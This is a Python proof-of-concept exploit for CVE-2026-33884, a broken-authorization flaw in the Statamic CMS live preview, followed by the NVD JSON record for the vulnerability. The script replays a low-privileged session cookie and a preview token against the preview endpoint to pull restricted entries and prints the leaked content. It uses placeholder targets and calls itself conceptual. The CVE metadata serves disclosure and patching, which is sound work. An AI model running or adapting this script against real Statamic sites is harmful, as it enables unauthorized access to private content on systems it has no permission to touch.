CVE-2026-33884

import requests def exploit_statamic_preview(target_url, session_cookie, preview_token, restricted_entry_id): """ Conceptual PoC for CVE-2026-33884 Demonstrates accessing restricted content using a live preview token. """ # The endpoint might vary depending on Statamic configuration preview_endpoint = f"{target_url}/!/preview" headers = { "User-Agent": "Mozilla/5.0 (PoC-Scanner)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", } cookies = { "statamic_session": session_cookie } # Payload to access the restricted entry # The vulnerability lies in the server not strictly validating if the token # belongs to the requested entry ID. params = { "token": preview_token, "slug": restricted_entry_id, # or 'id' depending on route definition } try: print(f"[*] Attempting to access restricted entry ID: {restricted_entry_id}") response = requests.get(preview_endpoint, headers=headers, cookies=cookies, params=params) if response.status_code == 200: print("[+] Request successful. Content potentially leaked.") # Check if response body contains actual content data if len(response.text) > 100: print("[+] Preview content retrieved:") print(response.text[:500]) # Print first 500 chars else: print("[-] Response body seems empty.") else: print(f"[-] Failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Configuration TARGET = "http://vulnerable-statamic-site.local" # Low-privileged user session SESSION = "attacker_session_cookie_here" # A valid preview token obtained from any previewable content TOKEN = "valid_preview_token_here" # Target entry ID that should be restricted RESTRICTED_ID = "secret-article-123" exploit_statamic_preview(TARGET, SESSION, TOKEN, RESTRICTED_ID)

{"cve": {"id": "CVE-2026-33884", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:25.183", "lastModified": "2026-04-08T14:17:43.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, an authenticated Control Panel user with access to live preview could use a live preview token to access restricted content that the token was not intended for. This has been fixed in 5.73.16 and 6.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.16", "matchCriteriaId": "EACDC143-742E-4926-9C28-6095690EB549"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.2", "matchCriteriaId": "631FF065-0872-4DC7-AB25-AB74B782A9BE"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-8vwx-ccf6-5wg2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}